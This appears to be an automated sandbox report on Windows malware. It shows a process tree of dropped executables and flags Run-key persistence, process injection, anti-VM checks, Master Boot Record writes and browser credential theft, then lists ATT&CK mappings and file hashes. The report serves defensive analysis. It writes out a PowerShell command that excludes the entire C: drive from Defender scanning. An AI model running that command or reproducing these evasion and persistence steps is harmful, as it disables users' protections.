C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:6824
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:8608
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10480910101\DgQBvwg.exe"C:\Users\Admin\AppData\Local\Temp\10480910101\DgQBvwg.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2836 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\epds5nbj\epds5nbj.cmdline"7⤵PID:1052
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5F80.tmp" "c:\Users\Admin\AppData\Local\Temp\epds5nbj\CSCD457F3A6121541758328563B766ABCF6.TMP"8⤵PID:4776
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:3432
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:4144
-
-
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10481850271\ArFLIYD.msi" /quiet6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4580
-
-
C:\Users\Admin\AppData\Local\Temp\10491450101\5LlBAvp.exe"C:\Users\Admin\AppData\Local\Temp\10491450101\5LlBAvp.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4688 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:3656
-
-
-
C:\Users\Admin\AppData\Local\Temp\10491470101\YSdglTu.exe"C:\Users\Admin\AppData\Local\Temp\10491470101\YSdglTu.exe"6⤵
- Executes dropped EXE
PID:5816 -
C:\Users\Admin\AppData\Local\Temp\10491470101\YSdglTu.exe"C:\Users\Admin\AppData\Local\Temp\10491470101\YSdglTu.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2256
-
-
-
C:\Users\Admin\AppData\Local\Temp\10491920101\Pgpx359.exe"C:\Users\Admin\AppData\Local\Temp\10491920101\Pgpx359.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4952
-
-
C:\Users\Admin\AppData\Local\Temp\10491950101\e9ff9c3a5a.exe"C:\Users\Admin\AppData\Local\Temp\10491950101\e9ff9c3a5a.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6028
-
-
C:\Users\Admin\AppData\Local\Temp\10491960101\a31e3b2417.exe"C:\Users\Admin\AppData\Local\Temp\10491960101\a31e3b2417.exe"6⤵
- Executes dropped EXE
PID:1196
-
-
C:\Users\Admin\AppData\Local\Temp\10491970101\10f280b706.exe"C:\Users\Admin\AppData\Local\Temp\10491970101\10f280b706.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5428
-
-
C:\Users\Admin\AppData\Local\Temp\10491980101\Pgpx359.exe"C:\Users\Admin\AppData\Local\Temp\10491980101\Pgpx359.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6096
-
-
C:\Users\Admin\AppData\Local\Temp\10491990101\YSdglTu.exe"C:\Users\Admin\AppData\Local\Temp\10491990101\YSdglTu.exe"6⤵
- Executes dropped EXE
PID:5588 -
C:\Users\Admin\AppData\Local\Temp\10491990101\YSdglTu.exe"C:\Users\Admin\AppData\Local\Temp\10491990101\YSdglTu.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:392
-
-
-
C:\Users\Admin\AppData\Local\Temp\10492000101\5LlBAvp.exe"C:\Users\Admin\AppData\Local\Temp\10492000101\5LlBAvp.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5728 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:4544
-
-
-
C:\Users\Admin\AppData\Local\Temp\10492010101\ibC8xs1.exe"C:\Users\Admin\AppData\Local\Temp\10492010101\ibC8xs1.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:4584 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yweaj5ti\yweaj5ti.cmdline"7⤵PID:4768
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4C32.tmp" "c:\Users\Admin\AppData\Local\Temp\yweaj5ti\CSCFCC3A98BC67C4C3AB439748E47B3BDDC.TMP"8⤵PID:4116
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:3704
-
-
-
C:\Users\Admin\AppData\Local\Temp\10492020101\DgQBvwg.exe"C:\Users\Admin\AppData\Local\Temp\10492020101\DgQBvwg.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:5556 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\13ccdy5m\13ccdy5m.cmdline"7⤵PID:6136
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5C30.tmp" "c:\Users\Admin\AppData\Local\Temp\13ccdy5m\CSC6652D1F6AE054734A6D466CC6824DE.TMP"8⤵PID:6124
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:5528
-
-
-
C:\Users\Admin\AppData\Local\Temp\10492030101\UZPt0hR.exe"C:\Users\Admin\AppData\Local\Temp\10492030101\UZPt0hR.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:5984 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵PID:3304
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
PID:1424
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:2780 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵
- Executes dropped EXE
PID:6116
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵
- Deletes itself
- Executes dropped EXE
PID:5520 -
C:\Users\Admin\AppData\Local\Temp\{13c64baf-8662-484a-a650-0957176873d4}\65086ede.exe"C:\Users\Admin\AppData\Local\Temp\{13c64baf-8662-484a-a650-0957176873d4}\65086ede.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot9⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
PID:9280 -
C:\Users\Admin\AppData\Local\Temp\{9983d2eb-b721-416b-8761-8fdc56014a69}\dfe9b371.exeC:/Users/Admin/AppData/Local/Temp/{9983d2eb-b721-416b-8761-8fdc56014a69}/\dfe9b371.exe -accepteula -adinsilent -silent -processlevel 2 -postboot10⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Loads dropped DLL
- Adds Run key to start application
- Writes to the Master Boot Record (MBR)
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
- Suspicious behavior: LoadsDriver
PID:5428
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10492040101\larBxd7.exe"C:\Users\Admin\AppData\Local\Temp\10492040101\larBxd7.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:14176
-
-
C:\Users\Admin\AppData\Local\Temp\10492050101\72795d1f06.exe"C:\Users\Admin\AppData\Local\Temp\10492050101\72795d1f06.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6540
-
-
C:\Users\Admin\AppData\Local\Temp\10492060101\9sWdA2p.exe"C:\Users\Admin\AppData\Local\Temp\10492060101\9sWdA2p.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7116
-
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10492070271\ArFLIYD.msi" /quiet6⤵
- System Location Discovery: System Language Discovery
PID:5640
-
-
C:\Users\Admin\AppData\Local\Temp\10492080101\AfkeY2q.exe"C:\Users\Admin\AppData\Local\Temp\10492080101\AfkeY2q.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:11044
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe1⤵
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Windows\explorer.exeexplorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe2⤵PID:980
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:392 -
C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1272 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0wxwmv22\0wxwmv22.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES266F.tmp" "c:\Users\Admin\AppData\Local\Temp\0wxwmv22\CSC255BE67223D74B7695ED876B31CCE21.TMP"4⤵PID:548
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:888
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- System Location Discovery: System Language Discovery
PID:4248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe1⤵PID:1208
-
C:\Windows\explorer.exeexplorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe2⤵PID:3236
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3152 -
C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe"C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1008 -
C:\Users\Admin\AppData\Roaming\Servicemon\steamerrorreporter.exeC:\Users\Admin\AppData\Roaming\Servicemon\steamerrorreporter.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:4420 -
C:\Users\Admin\AppData\Local\Temp\remoteBggbv2.exeC:\Users\Admin\AppData\Local\Temp\remoteBggbv2.exe4⤵
- Loads dropped DLL
PID:4084
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe4⤵
- System Location Discovery: System Language Discovery
PID:5248
-
-
-
-
C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe"C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2732 -
C:\Users\Admin\AppData\Roaming\Servicemon\steamerrorreporter.exeC:\Users\Admin\AppData\Roaming\Servicemon\steamerrorreporter.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:9032
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:4156
-
C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4616 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pexoxxs1\pexoxxs1.cmdline"3⤵PID:5028
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3236
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7819.tmp" "c:\Users\Admin\AppData\Local\Temp\pexoxxs1\CSCCBE2B6E3F4BD4614A1B71E7A59A1636B.TMP"4⤵PID:4952
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:1200
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- System Location Discovery: System Language Discovery
PID:3080
-
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:1508
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:4988
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6116
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe1⤵PID:3008
-
C:\Windows\explorer.exeexplorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe2⤵PID:5256
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:5276
-
C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3088 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\keo0zyvl\keo0zyvl.cmdline"3⤵PID:4608
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES573E.tmp" "c:\Users\Admin\AppData\Local\Temp\keo0zyvl\CSCD5957FF8AD664E308AE04D6B2FF14B22.TMP"4⤵PID:3924
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- System Location Discovery: System Language Discovery
PID:5864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe1⤵PID:5696
-
C:\Windows\explorer.exeexplorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe2⤵PID:3544
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:5368
-
C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5692 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\auoxkrg0\auoxkrg0.cmdline"3⤵PID:1236
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6EAE.tmp" "c:\Users\Admin\AppData\Local\Temp\auoxkrg0\CSCB2A8A9003624102986E42DE5623F633.TMP"4⤵PID:5572
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:6096
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:3676
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:5608
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:1504
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- System Location Discovery: System Language Discovery
PID:4920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:3640
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:5960
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:13840
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{ad191732-16cd-4bbe-8b10-aeb710ea48c9}\22673f59-a95e-41d9-b9a7-ef07a0444460.cmd"ÿ1⤵PID:10836
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Modify Authentication Process
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Safe Mode Boot
1Modify Authentication Process
1Modify Registry
2Pre-OS Boot
1Bootkit
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD58cc7df421ccb9f214a7beb04e056988f
SHA1377bc398f981f415e1351c5722db081075b01fbd
SHA25622d048608ae5c5ce7708c29b88a47421d85295c42b359a2ae56e791b1be27739
SHA5128ebf8aa752ba859fff17c609aa76673ebbb4ad6abece206268e4dc82e23e8c6a76d8618b92e7fbc8b552df71dcafab8e9976cdb4dc33d2980f3f7c9962a69abd
-
Filesize
3KB
MD52b9ff8a02d598cb9bde6ba1e89d2073c
SHA1293fdbde07c1d4c1833b459f5beb0a83c4ab5bce
SHA25645e93f878e752615cc76273791060b68201b2ac970954aa74192337876dbf5a2
SHA512510df9735ef9ed42a6433b2d076e3cef83dd5c7f6843566ebf18c0500757beeb72aa69f863af976d07f901f5d34bfdd87938aa9a5e92290298ba11eb94f9bf51
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
80KB
MD5460d6c9a84b1f07055e67050947f68a4
SHA163db5a5551bd063180ff46e8849995e58d52eb18
SHA256258cbfc58a2852f12bf4aa410763a45e4c5bce5c2cca2a23cdab9377f6e358b4
SHA512816bc899d7354c6e0e9593b616d086722c0e429e02f5384bff71ddf4644c1df2a95fdbced3a325eba44bca34db48ee0a6c7597b491fd0ab9108048982eb566da
-
Filesize
67KB
MD5456db093dd51927325ee689f07497956
SHA12524317a67d840e4d96ab31a7ab6989655973713
SHA2561a61a0a00095762db7ca2fddb238d6c53979717259bf22a271d7711cb8e8f7d4
SHA512578c769d55034e3b341d75bb8f1f00e47d18bd3c5692d81e986bdd4911117cb0c4499b082c251c84cdc74e08c5615702cc7dfd73b583043b2de6015b3fd5ba5b
-
Filesize
4.3MB
MD5f0190ef82225079af7af373399b851e5
SHA10cecbd808aa1b7fb71fc4855c7fc6d413ce3c8e0
SHA25636d823dcd2df7edfaad58339c163317eff508636815de4ace5e6e7aefa74d0ec
SHA5129461c1cfb123aa4cd417db20e9892600efbee4dc662399e4a9aba7605d80c32037c3e0c707bac7e843d88ab404c030c12351b178489d0b94a8d24c51197092d8
-
Filesize
560KB
MD5dc1681b98049f1df46dd10d7f4c26045
SHA14c7f5cf7c00b6139979f8aa41f46979666369224
SHA256594f9853124e0a81deeaaecb8ec3d192169e7393778214ef6d8f6460450ef080
SHA512c9a2086326acbab8aba801da0d8bd2aa06951ec7fd7f32a3150f9521498c0b6711552695fbf9d0de7668503630c508bcd68e1d715796ef34f9945035da3fe1ed
-
Filesize
341KB
MD5884013332bf332e4dd8cbf0109a8cfeb
SHA1c01789d661d465ca29d20174d8f5d29afb1fcffa
SHA2568ed104f6d7a50f95d515005bf6bd5569cd2dc0107119aa3d91e21dd7ba777e98
SHA512ea18f416b1295edcfc197c685d56030246097bf95ffffa46f13a16753d05d95a1adb83b5ba0669eaa1049856ea2486ca0fc49507df7d41572de80701e9852f64
-
Filesize
519KB
MD5e72abad31c8da5ef51f9d9f253ffbf8e
SHA1b516ca096b5f9d4f5e899a42b57c1358469f9511
SHA256745c63df892ca8cd0c59edc7400df6a7399240d8ee7f73b8025f6c327fc187f6
SHA5125c0696b4e15c15c4022d41c889f5ba304d1d698f9da0f23691fdeb88851195bdf8ee10e3b755a6fb4781af23d8393f1e22350806fc50ebc97e4ec1e53ab76188
-
Filesize
633B
MD5043a3f7769ea45be84cb4c60761c6a71
SHA1cdce7657f5026424e5a56963551e5857b0111bb1
SHA256d9fcde1d11472b92a9ee9936baeda9081080e80d66c06871423455877b4f8c30
SHA51263a7a7dc33cf131923c0cbf0dac5f21af8fef312a6a78b69173a42b164557cc6aa084ed4be6b66c87bfe899eef995defb7044c3d40ce5616a11d12ead2bb6064
-
Filesize
280B
MD5fed4ab68611c6ce720965bcb5dfbf546
SHA1af33fc71721625645993be6fcba5c5852e210864
SHA256c41acdf5d0a01d5e9720ef9f6d503099950791b6f975ba698ccd013c4defa8c4
SHA512f9ab23b3b4052f7fda6c9a3e8cd68056f21da5d0fcf28061331900cac6f31ef081705804d9a9d4103ee7d9c9bdb6aa4237987b7e821d2d96cd52da24219e55ee
-
Filesize
280B
MD54013ebc7b496bf70ecf9f6824832d4ae
SHA1cfdcdac5d8c939976c11525cf5e79c6a491c272a
SHA256fb1a67bdc2761f1f9e72bbc41b6fc0bf89c068205ffd0689e4f7e2c34264b22a
SHA51296822252f121fb358aa43d490bb5f5ce3a81c65c8de773c170f1d0e91da1e6beb83cb1fb9d4d656230344cd31c3dca51a6c421fda8e55598c364092232e0ad22
-
Filesize
69KB
MD5164a788f50529fc93a6077e50675c617
SHA1c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48
SHA256b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17
SHA512ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4
-
Filesize
6KB
MD55030c66eae6e2497450c5a63f832e695
SHA1db75133c27893b2faedd9b72425bb70b31b5137b
SHA256fa03e6ae22981a5754f846eeb28b82960a4e63780e4bb9728590671d2c759a94
SHA5122b34a977f1b0233d42f06d01282cca991613b80b620c2f5f785365384604debc7d17323c2403a6898cedbc1b6bb5c720d914a0d86b16e3e273ac8fc9342e61b2
-
Filesize
7KB
MD5f620831db11f22e37ecad2e1841f2c4c
SHA1292d039fd745514007c86fa354ef2c7e566c3747
SHA2565ab024604dfb359f14d092e9d7b416da076f1a97d33d07bf6c128bd839e71aa5
SHA5125a4781a201453f1adc2adf4f2dfb7030e3a9b30077b69b4753a1523234c97975f7a53d5b19db5d0b85e5251e7b11e1a6b2080645e62e7cc42e783f5c753793ca
-
Filesize
2.0MB
MD5ca9fee5014702ec1649be42fd145c974
SHA176c5a82e2ec29dd2a0b6c3b0f3748e4ec646fbf8
SHA2563b2a25c2c6a1880f639f4275bc5c7b9b80799c5f111795f1b269f71faa9483bd
SHA51204dac99ed852bfb22780394cd4426dafa445f907692d3ee7fa8814c3fcea5473e3f3d7ee10135401ccbd912c72afb56d97a1554c765eb4888b7eae7ac6573929
-
Filesize
8KB
MD59982ab45e481c9ca4ede089aca344fe9
SHA1fc208ea14f3683facc0d8d677c4756e7332bf971
SHA25694c4e15aa51f7f52da89d8dbdcf2fb6b8b64fcddf2e705e3e3c5692ff9bd9a0d
SHA512b3aeadc8dc0f21ce42783385090bd2545a2c55cc92582a2327d0e65b1d80aeac24713e7a1f9d138bf3969e07278a4bd9f1aab6de21ac3f1c145d8e6fe5092f48
-
Filesize
18.2MB
MD52ed83182a2c54f262b0b63ab54ebe8f2
SHA14a3a0e023b11d89e21fe2d410d329dd3087cc259
SHA2566b15d8a3ac38d07997df344bde98a1eabd49bf52f5fe4c8f256c60951859021d
